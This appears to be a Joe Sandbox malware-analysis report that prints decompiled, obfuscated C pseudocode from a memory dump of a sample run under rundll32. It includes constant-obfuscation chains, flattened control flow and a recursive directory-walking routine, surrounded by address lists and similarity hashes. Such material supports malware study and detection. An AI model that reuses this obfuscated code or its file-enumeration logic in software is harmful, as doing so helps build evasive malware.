                                                                                                                                                            				_v2708 = 0xf9311d;
                                                                                                                                                            				_v2708 = _v2708 >> 2;
                                                                                                                                                            				_t406 = _v2708 * 0x30;
                                                                                                                                                            				_v2708 = _t406;
                                                                                                                                                            				_v2708 = _v2708 + 0xffffde46;
                                                                                                                                                            				_v2708 = _v2708 ^ 0x0bad021b;
                                                                                                                                                            				_v2624 = 0x51d14;
                                                                                                                                                            				_v2624 = _v2624 | 0x271919e8;
                                                                                                                                                            				_v2624 = _v2624 ^ 0x2716653c;
                                                                                                                                                            				_v2716 = 0x708eea;
                                                                                                                                                            				_v2716 = _v2716 + 0xfffff8d8;
                                                                                                                                                            				_v2716 = _v2716 | 0x4ca3cf3c;
                                                                                                                                                            				_v2716 = _v2716 ^ 0x396f5f4d;
                                                                                                                                                            				_v2716 = _v2716 ^ 0x7599e4cd;
                                                                                                                                                            				_v2724 = 0x3acc77;
                                                                                                                                                            				_v2724 = _v2724 + 0x56d;
                                                                                                                                                            				_v2724 = _v2724 + 0xb0bb;
                                                                                                                                                            				_v2724 = _v2724 + 0xffffce89;
                                                                                                                                                            				_v2724 = _v2724 ^ 0x003c4612;
                                                                                                                                                            				while(_t468 != 0x5de06da) {
                                                                                                                                                            					if(_t468 == 0xea1969c) {
                                                                                                                                                            						_t468 = 0xfa9128f;
                                                                                                                                                            						continue;
                                                                                                                                                            					} else {
                                                                                                                                                            						_t480 = _t468 - 0xfa9128f;
                                                                                                                                                            						if(_t468 != 0xfa9128f) {
                                                                                                                                                            							L8:
                                                                                                                                                            							__eflags = _t468 - 0xa8e801c;
                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            						} else {
                                                                                                                                                            							E0038DA22(_v2652, _v2608, _t480, _v2736,  &_v2600, _t431, _v2768);
                                                                                                                                                            							 *((short*)(E0037B6CF( &_v2600, _v2760, _v2604, _v2696))) = 0;
                                                                                                                                                            							E00378969(_v2720,  &_v1560, _t480, _v2644, _v2668);
                                                                                                                                                            							_push(_v2752);
                                                                                                                                                            							_push(_v2660);
                                                                                                                                                            							E003747CE( &_v2600, _v2676, _v2692, _v2612, _v2628, E0038DCF7(_v2692, 0x371308, _t480),  &_v1560, _v2616, _v2636);
                                                                                                                                                            							E0037A8B0(_v2728, _t419, _v2620);
                                                                                                                                                            							_t431 = _v2684;
                                                                                                                                                            							_t406 = E0037EA99(_v2684, _t467, _v2656, _v2712,  &_v2080, _v2744);
                                                                                                                                                            							_t472 =  &(_t472[0x17]);
                                                                                                                                                            							if(_t406 != 0) {
                                                                                                                                                            								_t468 = 0x5de06da;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					return _t406;
                                                                                                                                                            				}
                                                                                                                                                            				_push(_v2648);
                                                                                                                                                            				_push(_v2700);
                                                                                                                                                            				_push(_v2772);
                                                                                                                                                            				_push( &_v1040);
                                                                                                                                                            				E003846BB(_v2704, _v2764);
                                                                                                                                                            				_push(_v2756);
                                                                                                                                                            				_push(_v2748);
                                                                                                                                                            				E003747CE( &_v1040, _v2672, _v2640, _v2680, _v2732, E0038DCF7(_v2640, 0x3713b8, __eflags),  &_v2080, _v2740, _v2688);
                                                                                                                                                            				_t435 = _v2632;
                                                                                                                                                            				E0037A8B0(_t435, _t409, _v2664);
                                                                                                                                                            				__eflags = 0;
                                                                                                                                                            				_push(_v2724);
                                                                                                                                                            				_push(0);
                                                                                                                                                            				_push(_t435);
                                                                                                                                                            				_push(0);
                                                                                                                                                            				_push(0);
                                                                                                                                                            				_push(_v2716);
                                                                                                                                                            				_t431 = _v2708;
                                                                                                                                                            				_push( &_v520);
                                                                                                                                                            				_t406 = E0037AB87(_v2708, _v2624, 0);
                                                                                                                                                            				_t472 = _t472 - 0xc + 0x64;
                                                                                                                                                            				_t468 = 0xa8e801c;
                                                                                                                                                            				goto L8;
                                                                                                                                                            			}
                                                                                                                                                            0x0038102c
                                                                                                                                                            0x00381034
                                                                                                                                                            0x0038103c
                                                                                                                                                            0x0038104c
                                                                                                                                                            0x00381050
                                                                                                                                                            0x00381058
                                                                                                                                                            0x00381060
                                                                                                                                                            0x00381072
                                                                                                                                                            0x00381075
                                                                                                                                                            0x0038107c
                                                                                                                                                            0x00381089
                                                                                                                                                            0x00381094
                                                                                                                                                            0x0038109f
                                                                                                                                                            0x003810aa
                                                                                                                                                            0x003810bf
                                                                                                                                                            0x003810c2
                                                                                                                                                            0x003810c9
                                                                                                                                                            0x003810d4
                                                                                                                                                            0x003810df
                                                                                                                                                            0x003810e6
                                                                                                                                                            0x003810f1
                                                                                                                                                            0x003810f9
                                                                                                                                                            0x00381105
                                                                                                                                                            0x00381109
                                                                                                                                                            0x0038110e
                                                                                                                                                            0x00381116
                                                                                                                                                            0x00381121
                                                                                                                                                            0x0038112c
                                                                                                                                                            0x00381137
                                                                                                                                                            0x0038113f
                                                                                                                                                            0x00381144
                                                                                                                                                            0x0038114c
                                                                                                                                                            0x00381154
                                                                                                                                                            0x0038115f
                                                                                                                                                            0x0038116a
                                                                                                                                                            0x00381175
                                                                                                                                                            0x0038117d
                                                                                                                                                            0x00381185
                                                                                                                                                            0x0038118a
                                                                                                                                                            0x00381192
                                                                                                                                                            0x0038119a
                                                                                                                                                            0x003811a2
                                                                                                                                                            0x003811aa
                                                                                                                                                            0x003811b7
                                                                                                                                                            0x003811ba
                                                                                                                                                            0x003811be
                                                                                                                                                            0x003811c6
                                                                                                                                                            0x003811ce
                                                                                                                                                            0x003811d3
                                                                                                                                                            0x003811db
                                                                                                                                                            0x003811e3
                                                                                                                                                            0x003811eb
                                                                                                                                                            0x003811f0
                                                                                                                                                            0x003811f5
                                                                                                                                                            0x003811fd
                                                                                                                                                            0x00381205
                                                                                                                                                            0x00381215
                                                                                                                                                            0x00381219
                                                                                                                                                            0x00381222
                                                                                                                                                            0x00381227
                                                                                                                                                            0x0038122d
                                                                                                                                                            0x00381235
                                                                                                                                                            0x00381247
                                                                                                                                                            0x0038124a
                                                                                                                                                            0x00381251
                                                                                                                                                            0x0038125c
                                                                                                                                                            0x00381267
                                                                                                                                                            0x0038126f
                                                                                                                                                            0x0038127a
                                                                                                                                                            0x00381282
                                                                                                                                                            0x0038128a
                                                                                                                                                            0x00381292
                                                                                                                                                            0x0038129a
                                                                                                                                                            0x003812a7
                                                                                                                                                            0x003812b9
                                                                                                                                                            0x003812bd
                                                                                                                                                            0x003812c2
                                                                                                                                                            0x003812c7
                                                                                                                                                            0x003812cf
                                                                                                                                                            0x003812d7
                                                                                                                                                            0x003812e1
                                                                                                                                                            0x003812e5
                                                                                                                                                            0x003812ed
                                                                                                                                                            0x003812f5
                                                                                                                                                            0x003812f9
                                                                                                                                                            0x00381301
                                                                                                                                                            0x00381309
                                                                                                                                                            0x00381311
                                                                                                                                                            0x00381319
                                                                                                                                                            0x00381321
                                                                                                                                                            0x00381325
                                                                                                                                                            0x0038132d
                                                                                                                                                            0x0038133a
                                                                                                                                                            0x0038133e
                                                                                                                                                            0x00381343
                                                                                                                                                            0x0038134b
                                                                                                                                                            0x00381353
                                                                                                                                                            0x0038135b
                                                                                                                                                            0x00381365
                                                                                                                                                            0x00381369
                                                                                                                                                            0x00381371
                                                                                                                                                            0x0038137c
                                                                                                                                                            0x00381387
                                                                                                                                                            0x00381392
                                                                                                                                                            0x0038139f
                                                                                                                                                            0x003813a3
                                                                                                                                                            0x003813ab
                                                                                                                                                            0x003813b3
                                                                                                                                                            0x003813bb
                                                                                                                                                            0x003813c0
                                                                                                                                                            0x003813c5
                                                                                                                                                            0x003813c9
                                                                                                                                                            0x003813d1
                                                                                                                                                            0x003813d9
                                                                                                                                                            0x003813e4
                                                                                                                                                            0x003813ef
                                                                                                                                                            0x003813fa
                                                                                                                                                            0x00381402
                                                                                                                                                            0x0038140a
                                                                                                                                                            0x00381412
                                                                                                                                                            0x0038141a
                                                                                                                                                            0x00381422
                                                                                                                                                            0x0038142a
                                                                                                                                                            0x00381432
                                                                                                                                                            0x0038143a
                                                                                                                                                            0x00381442
                                                                                                                                                            0x0038144a
                                                                                                                                                            0x00381458
                                                                                                                                                            0x00381572
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038145e
                                                                                                                                                            0x0038145e
                                                                                                                                                            0x00381460
                                                                                                                                                            0x0038163b
                                                                                                                                                            0x0038163b
                                                                                                                                                            0x00381641
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00381466
                                                                                                                                                            0x00381485
                                                                                                                                                            0x003814bc
                                                                                                                                                            0x003814c3
                                                                                                                                                            0x003814c8
                                                                                                                                                            0x003814d1
                                                                                                                                                            0x00381524
                                                                                                                                                            0x00381536
                                                                                                                                                            0x00381554
                                                                                                                                                            0x0038155b
                                                                                                                                                            0x00381560
                                                                                                                                                            0x00381565
                                                                                                                                                            0x0038156b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038156b
                                                                                                                                                            0x00381565
                                                                                                                                                            0x00381460
                                                                                                                                                            0x00381651
                                                                                                                                                            0x00381651
                                                                                                                                                            0x00381579
                                                                                                                                                            0x00381587
                                                                                                                                                            0x0038158b
                                                                                                                                                            0x0038159a
                                                                                                                                                            0x0038159b
                                                                                                                                                            0x003815a0
                                                                                                                                                            0x003815a9
                                                                                                                                                            0x003815f0
                                                                                                                                                            0x003815fc
                                                                                                                                                            0x00381605
                                                                                                                                                            0x0038160d
                                                                                                                                                            0x0038160f
                                                                                                                                                            0x00381613
                                                                                                                                                            0x00381614
                                                                                                                                                            0x00381615
                                                                                                                                                            0x00381616
                                                                                                                                                            0x00381617
                                                                                                                                                            0x00381629
                                                                                                                                                            0x0038162d
                                                                                                                                                            0x0038162e
                                                                                                                                                            0x00381633
                                                                                                                                                            0x00381636
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: Fo$M_o9$[K
                                                                                                                                                            • API String ID: 0-3743190696
                                                                                                                                                            • Opcode ID: 7e8a23495d65c90e08f7d2b8c8d0d77523ef81c28855e976aaa16928088556cf
                                                                                                                                                            • Instruction ID: b3d79d3094c2d14026b189b8150aa5f92d399eab0bea1b453c5b0d0a028afbd4
                                                                                                                                                            • Opcode Fuzzy Hash: 7e8a23495d65c90e08f7d2b8c8d0d77523ef81c28855e976aaa16928088556cf
                                                                                                                                                            • Instruction Fuzzy Hash: 03121EB14093818FD3A9CF21C58AA8BBBF1FBC5748F10891DE5DA96260D7B58909CF13
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 80%
                                                                                                                                                            			E00379DCF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				signed int _v84;
                                                                                                                                                            				signed int _v88;
                                                                                                                                                            				signed int _v92;
                                                                                                                                                            				signed int _v96;
                                                                                                                                                            				signed int _v100;
                                                                                                                                                            				signed int _v104;
                                                                                                                                                            				signed int _v108;
                                                                                                                                                            				signed int _v112;
                                                                                                                                                            				signed int _v116;
                                                                                                                                                            				signed int _v120;
                                                                                                                                                            				signed int _v124;
                                                                                                                                                            				intOrPtr _v136;
                                                                                                                                                            				char _v160;
                                                                                                                                                            				short _v708;
                                                                                                                                                            				short _v710;
                                                                                                                                                            				char _v712;
                                                                                                                                                            				signed int _v756;
                                                                                                                                                            				char _v1276;
                                                                                                                                                            				char _v1796;
                                                                                                                                                            				void* _t278;
                                                                                                                                                            				signed int _t306;
                                                                                                                                                            				signed int _t310;
                                                                                                                                                            				void* _t312;
                                                                                                                                                            				intOrPtr _t317;
                                                                                                                                                            				void* _t319;
                                                                                                                                                            				signed int _t324;
                                                                                                                                                            				void* _t327;
                                                                                                                                                            				void* _t353;
                                                                                                                                                            				signed int _t365;
                                                                                                                                                            				signed int _t366;
                                                                                                                                                            				signed int _t367;
                                                                                                                                                            				signed int _t368;
                                                                                                                                                            				signed int _t369;
                                                                                                                                                            				signed int _t370;
                                                                                                                                                            				void* _t373;
                                                                                                                                                            				void* _t374;
                                                                                                                                                            
                                                                                                                                                            				_t317 = _a12;
                                                                                                                                                            				_push(_a24);
                                                                                                                                                            				_push(_a20);
                                                                                                                                                            				_push(_a16);
                                                                                                                                                            				_push(_t317);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t278);
                                                                                                                                                            				_v44 = 0x411c30;
                                                                                                                                                            				_t374 = _t373 + 0x20;
                                                                                                                                                            				_v44 = _v44 ^ 0x3aebcc2b;
                                                                                                                                                            				_v44 = _v44 ^ 0x10090153;
                                                                                                                                                            				_t319 = 0x338c922;
                                                                                                                                                            				_v44 = _v44 ^ 0x2aa3d158;
                                                                                                                                                            				_v56 = 0xa7c140;
                                                                                                                                                            				_v56 = _v56 >> 1;
                                                                                                                                                            				_v56 = _v56 ^ 0xbf613798;
                                                                                                                                                            				_v56 = _v56 ^ 0xbf3c535c;
                                                                                                                                                            				_v88 = 0xb7ebf9;
                                                                                                                                                            				_t365 = 0x52;
                                                                                                                                                            				_v88 = _v88 / _t365;
                                                                                                                                                            				_v88 = _v88 ^ 0x0004e01e;
                                                                                                                                                            				_v112 = 0x1a3e5b;
                                                                                                                                                            				_v112 = _v112 + 0xd588;
                                                                                                                                                            				_v112 = _v112 ^ 0x0012c9bc;
                                                                                                                                                            				_v8 = 0x55b84a;
                                                                                                                                                            				_t366 = 0x72;
                                                                                                                                                            				_v8 = _v8 * 0x74;
                                                                                                                                                            				_v8 = _v8 + 0xffff07de;
                                                                                                                                                            				_v8 = _v8 * 0x41;
                                                                                                                                                            				_v8 = _v8 ^ 0xdc74eedb;
                                                                                                                                                            				_v96 = 0x123c4e;
                                                                                                                                                            				_v96 = _v96 + 0x1d06;
                                                                                                                                                            				_v96 = _v96 ^ 0x001f978b;
                                                                                                                                                            				_v124 = 0x58f8d3;
                                                                                                                                                            				_v124 = _v124 * 0x2b;
                                                                                                                                                            				_v124 = _v124 ^ 0x0efbe47e;
                                                                                                                                                            				_v120 = 0x58d481;
                                                                                                                                                            				_v120 = _v120 << 5;
                                                                                                                                                            				_v120 = _v120 ^ 0x0b1fdd63;
                                                                                                                                                            				_v32 = 0x85548e;
                                                                                                                                                            				_v32 = _v32 / _t366;
                                                                                                                                                            				_v32 = _v32 * 0x2e;
                                                                                                                                                            				_v32 = _v32 ^ 0x0037cfdf;
                                                                                                                                                            				_v108 = 0x851b7a;
                                                                                                                                                            				_v108 = _v108 | 0xf3ff5f40;
                                                                                                                                                            				_v108 = _v108 ^ 0xf3fc1521;
                                                                                                                                                            				_v76 = 0x86d28f;
                                                                                                                                                            				_v76 = _v76 >> 0xd;
                                                                                                                                                            				_v76 = _v76 ^ 0x000a85f2;
                                                                                                                                                            				_v48 = 0x8a8988;
                                                                                                                                                            				_v48 = _v48 + 0xffff9d54;
                                                                                                                                                            				_v48 = _v48 + 0xffffb441;
                                                                                                                                                            				_v48 = _v48 ^ 0x008c2bbe;
                                                                                                                                                            				_v80 = 0x3fe2a4;
                                                                                                                                                            				_v80 = _v80 ^ 0x5e00b743;
                                                                                                                                                            				_v80 = _v80 ^ 0x5e39b1b0;
                                                                                                                                                            				_v116 = 0x4ea08b;
                                                                                                                                                            				_v116 = _v116 + 0xffffca32;
                                                                                                                                                            				_v116 = _v116 ^ 0x00427ef9;
                                                                                                                                                            				_v104 = 0xba6181;
                                                                                                                                                            				_v104 = _v104 + 0xf529;
                                                                                                                                                            				_v104 = _v104 ^ 0x00b33727;
                                                                                                                                                            				_v52 = 0x1e8210;
                                                                                                                                                            				_v52 = _v52 >> 8;
                                                                                                                                                            				_v52 = _v52 | 0xffb97487;
                                                                                                                                                            				_v52 = _v52 ^ 0xffb16a42;
                                                                                                                                                            				_v40 = 0xeabfd3;
                                                                                                                                                            				_v40 = _v40 ^ 0x26644279;
                                                                                                                                                            				_t367 = 0x3a;
                                                                                                                                                            				_v40 = _v40 / _t367;
                                                                                                                                                            				_v40 = _v40 ^ 0x00a36ea5;
                                                                                                                                                            				_v12 = 0xc9f67b;
                                                                                                                                                            				_v12 = _v12 + 0x836b;
                                                                                                                                                            				_v12 = _v12 | 0xa1408986;
                                                                                                                                                            				_t368 = 0x45;
                                                                                                                                                            				_v12 = _v12 * 0x75;
                                                                                                                                                            				_v12 = _v12 ^ 0xf1cc1c9a;
                                                                                                                                                            				_v36 = 0x1f6921;
                                                                                                                                                            				_v36 = _v36 ^ 0x9bf749ed;
                                                                                                                                                            				_v36 = _v36 / _t368;
                                                                                                                                                            				_v36 = _v36 ^ 0x024ed910;
                                                                                                                                                            				_v64 = 0x37ccf2;
                                                                                                                                                            				_v64 = _v64 + 0xfffff775;
                                                                                                                                                            				_t369 = 0x19;
                                                                                                                                                            				_v64 = _v64 * 0x24;
                                                                                                                                                            				_v64 = _v64 ^ 0x07d7b77b;
                                                                                                                                                            				_v28 = 0x370f8;
                                                                                                                                                            				_v28 = _v28 << 0xd;
                                                                                                                                                            				_v28 = _v28 + 0x6470;
                                                                                                                                                            				_v28 = _v28 >> 1;
                                                                                                                                                            				_v28 = _v28 ^ 0x37097055;
                                                                                                                                                            				_v20 = 0x84152c;
                                                                                                                                                            				_v20 = _v20 * 0x7e;
                                                                                                                                                            				_v20 = _v20 / _t369;
                                                                                                                                                            				_v20 = _v20 << 0xe;
                                                                                                                                                            				_v20 = _v20 ^ 0x6c90d6a3;
                                                                                                                                                            				_v60 = 0x687dd9;
                                                                                                                                                            				_t370 = 0xc;
                                                                                                                                                            				_v60 = _v60 * 0x1d;
                                                                                                                                                            				_v60 = _v60 << 7;
                                                                                                                                                            				_v60 = _v60 ^ 0xeb212648;
                                                                                                                                                            				_v84 = 0xd09924;
                                                                                                                                                            				_v84 = _v84 * 0x7c;
                                                                                                                                                            				_v84 = _v84 ^ 0x650614c5;
                                                                                                                                                            				_v100 = 0x3804f2;
                                                                                                                                                            				_v100 = _v100 | 0x9eb8052c;
                                                                                                                                                            				_v100 = _v100 ^ 0x9eb506d7;
                                                                                                                                                            				_v92 = 0xf492b0;
                                                                                                                                                            				_v92 = _v92 + 0xffffc4ae;
                                                                                                                                                            				_v92 = _v92 ^ 0x00fafa5e;
                                                                                                                                                            				_v16 = 0xd0e41e;
                                                                                                                                                            				_v16 = _v16 * 0x3d;
                                                                                                                                                            				_v16 = _v16 >> 0xd;
                                                                                                                                                            				_v16 = _v16 >> 0xe;
                                                                                                                                                            				_v16 = _v16 ^ 0x000dc1c9;
                                                                                                                                                            				_v24 = 0x66d2fe;
                                                                                                                                                            				_v24 = _v24 / _t370;
                                                                                                                                                            				_v24 = _v24 + 0xffffccd2;
                                                                                                                                                            				_v24 = _v24 ^ 0x0a93dd72;
                                                                                                                                                            				_v24 = _v24 ^ 0x0a9c564f;
                                                                                                                                                            				_v72 = 0xbcf4e;
                                                                                                                                                            				_v72 = _v72 >> 7;
                                                                                                                                                            				_v72 = _v72 ^ 0x000c8ddf;
                                                                                                                                                            				_t364 = _v72;
                                                                                                                                                            				_v68 = 0x4616df;
                                                                                                                                                            				_v68 = _v68 + 0x9c8e;
                                                                                                                                                            				_v68 = _v68 + 0xaaef;
                                                                                                                                                            				_v68 = _v68 ^ 0x004c065d;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					L1:
                                                                                                                                                            					_t353 = 0x2e;
                                                                                                                                                            					L2:
                                                                                                                                                            					while(_t319 != 0x21229d9) {
                                                                                                                                                            						if(_t319 == 0x338c922) {
                                                                                                                                                            							_v136 = _t317;
                                                                                                                                                            							_t319 = 0x9035918;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t319 == 0x5b964d8) {
                                                                                                                                                            							__eflags = _v756 & _v44;
                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                            								_t306 = _a16( &_v756,  &_v160);
                                                                                                                                                            								asm("sbb ecx, ecx");
                                                                                                                                                            								_t324 =  ~_t306 & 0x09c7cc54;
                                                                                                                                                            								L9:
                                                                                                                                                            								_t319 = _t324 + 0x21229d9;
                                                                                                                                                            								while(1) {
                                                                                                                                                            									L1:
                                                                                                                                                            									_t353 = 0x2e;
                                                                                                                                                            									goto L2;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							__eflags = _v712 - _t353;
                                                                                                                                                            							if(_v712 != _t353) {
                                                                                                                                                            								L19:
                                                                                                                                                            								__eflags = _a24;
                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                            									_push(_v104);
                                                                                                                                                            									_push(_v116);
                                                                                                                                                            									_t312 = E0038DCF7(_v80, 0x3717a0, __eflags);
                                                                                                                                                            									_pop(_t327);
                                                                                                                                                            									E003747CE(_t317, _v52, _t327, _v40, _v12, _t312,  &_v712, _v36, _v64);
                                                                                                                                                            									E00379DCF(_v28, _v20, _v60, _a8,  &_v1276, _a16, _v84, _a24);
                                                                                                                                                            									_t310 = E0037A8B0(_v100, _t312, _v92);
                                                                                                                                                            									_t374 = _t374 + 0x3c;
                                                                                                                                                            									_t353 = 0x2e;
                                                                                                                                                            								}
                                                                                                                                                            								L18:
                                                                                                                                                            								_t319 = 0xbd9f62d;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            							__eflags = _v710;
                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                            								goto L18;
                                                                                                                                                            							}
                                                                                                                                                            							__eflags = _v710 - _t353;
                                                                                                                                                            							if(_v710 != _t353) {
                                                                                                                                                            								goto L19;
                                                                                                                                                            							}
                                                                                                                                                            							__eflags = _v708;
                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                            								goto L19;
                                                                                                                                                            							}
                                                                                                                                                            							goto L18;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t319 == 0x9035918) {
                                                                                                                                                            							_push(_v112);
                                                                                                                                                            							_push(_v88);
                                                                                                                                                            							E0037A918(_t317, __eflags, _v8, _v96, E0038DCF7(_v56, 0x371770, __eflags), _v124,  &_v1796);
                                                                                                                                                            							_t374 = _t374 + 0x1c;
                                                                                                                                                            							_t310 = E0037A8B0(_v120, _t307, _v32);
                                                                                                                                                            							_t319 = 0xb066d4a;
                                                                                                                                                            							while(1) {
                                                                                                                                                            								L1:
                                                                                                                                                            								_t353 = 0x2e;
                                                                                                                                                            								goto L2;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						if(_t319 == 0xb066d4a) {
                                                                                                                                                            							_t310 = E00377E00(_v108,  &_v756, _v76, _v48,  &_v1796);
                                                                                                                                                            							_t364 = _t310;
                                                                                                                                                            							_t374 = _t374 + 0xc;
                                                                                                                                                            							__eflags = _t310 - 0xffffffff;
                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                            								L25:
                                                                                                                                                            								return _t310;
                                                                                                                                                            							}
                                                                                                                                                            							_t319 = 0x5b964d8;
                                                                                                                                                            							goto L1;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t319 != 0xbd9f62d) {
                                                                                                                                                            							L24:
                                                                                                                                                            							__eflags = _t319 - 0xa89df2;
                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            							goto L25;
                                                                                                                                                            						}
                                                                                                                                                            						_t310 = E00374635(_v16,  &_v756, _t364, _v24);
                                                                                                                                                            						asm("sbb ecx, ecx");
                                                                                                                                                            						_t324 =  ~_t310 & 0x03a73aff;
                                                                                                                                                            						goto L9;
                                                                                                                                                            					}
                                                                                                                                                            					E00378ABF(_t364, _v72, _v68);
                                                                                                                                                            					_t319 = 0xa89df2;
                                                                                                                                                            					_t353 = 0x2e;
                                                                                                                                                            					goto L24;
                                                                                                                                                            				}
                                                                                                                                                            			}
                                                                                                                                                            0x00379f48
                                                                                                                                                            0x00379f4f
                                                                                                                                                            0x00379f56
                                                                                                                                                            0x00379f5d
                                                                                                                                                            0x00379f64
                                                                                                                                                            0x00379f6b
                                                                                                                                                            0x00379f71
                                                                                                                                                            0x00379f78
                                                                                                                                                            0x00379f7f
                                                                                                                                                            0x00379f86
                                                                                                                                                            0x00379f92
                                                                                                                                                            0x00379f97
                                                                                                                                                            0x00379f9c
                                                                                                                                                            0x00379fa3
                                                                                                                                                            0x00379faa
                                                                                                                                                            0x00379fb1
                                                                                                                                                            0x00379fbc
                                                                                                                                                            0x00379fbf
                                                                                                                                                            0x00379fc2
                                                                                                                                                            0x00379fc9
                                                                                                                                                            0x00379fd0
                                                                                                                                                            0x00379fde
                                                                                                                                                            0x00379fe1
                                                                                                                                                            0x00379fe8
                                                                                                                                                            0x00379fef
                                                                                                                                                            0x00379ffa
                                                                                                                                                            0x00379ffd
                                                                                                                                                            0x0037a000
                                                                                                                                                            0x0037a007
                                                                                                                                                            0x0037a00e
                                                                                                                                                            0x0037a012
                                                                                                                                                            0x0037a019
                                                                                                                                                            0x0037a01c
                                                                                                                                                            0x0037a023
                                                                                                                                                            0x0037a02e
                                                                                                                                                            0x0037a038
                                                                                                                                                            0x0037a03b
                                                                                                                                                            0x0037a03f
                                                                                                                                                            0x0037a046
                                                                                                                                                            0x0037a051
                                                                                                                                                            0x0037a052
                                                                                                                                                            0x0037a055
                                                                                                                                                            0x0037a059
                                                                                                                                                            0x0037a060
                                                                                                                                                            0x0037a06b
                                                                                                                                                            0x0037a06e
                                                                                                                                                            0x0037a075
                                                                                                                                                            0x0037a07c
                                                                                                                                                            0x0037a083
                                                                                                                                                            0x0037a08a
                                                                                                                                                            0x0037a091
                                                                                                                                                            0x0037a098
                                                                                                                                                            0x0037a09f
                                                                                                                                                            0x0037a0aa
                                                                                                                                                            0x0037a0ad
                                                                                                                                                            0x0037a0b1
                                                                                                                                                            0x0037a0b5
                                                                                                                                                            0x0037a0bc
                                                                                                                                                            0x0037a0c8
                                                                                                                                                            0x0037a0cb
                                                                                                                                                            0x0037a0d2
                                                                                                                                                            0x0037a0d9
                                                                                                                                                            0x0037a0e0
                                                                                                                                                            0x0037a0e7
                                                                                                                                                            0x0037a0eb
                                                                                                                                                            0x0037a0f2
                                                                                                                                                            0x0037a0f5
                                                                                                                                                            0x0037a0fc
                                                                                                                                                            0x0037a103
                                                                                                                                                            0x0037a10a
                                                                                                                                                            0x0037a111
                                                                                                                                                            0x0037a111
                                                                                                                                                            0x0037a113
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a114
                                                                                                                                                            0x0037a126
                                                                                                                                                            0x0037a2d3
                                                                                                                                                            0x0037a2d9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a2d9
                                                                                                                                                            0x0037a132
                                                                                                                                                            0x0037a1fa
                                                                                                                                                            0x0037a200
                                                                                                                                                            0x0037a2bf
                                                                                                                                                            0x0037a2c6
                                                                                                                                                            0x0037a2c8
                                                                                                                                                            0x0037a174
                                                                                                                                                            0x0037a174
                                                                                                                                                            0x0037a111
                                                                                                                                                            0x0037a111
                                                                                                                                                            0x0037a113
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a113
                                                                                                                                                            0x0037a111
                                                                                                                                                            0x0037a206
                                                                                                                                                            0x0037a20d
                                                                                                                                                            0x0037a236
                                                                                                                                                            0x0037a236
                                                                                                                                                            0x0037a23a
                                                                                                                                                            0x0037a23c
                                                                                                                                                            0x0037a244
                                                                                                                                                            0x0037a24a
                                                                                                                                                            0x0037a250
                                                                                                                                                            0x0037a273
                                                                                                                                                            0x0037a294
                                                                                                                                                            0x0037a2a1
                                                                                                                                                            0x0037a2a6
                                                                                                                                                            0x0037a2ab
                                                                                                                                                            0x0037a2ab
                                                                                                                                                            0x0037a22c
                                                                                                                                                            0x0037a22c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a22c
                                                                                                                                                            0x0037a20f
                                                                                                                                                            0x0037a217
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a219
                                                                                                                                                            0x0037a220
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a222
                                                                                                                                                            0x0037a22a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a22a
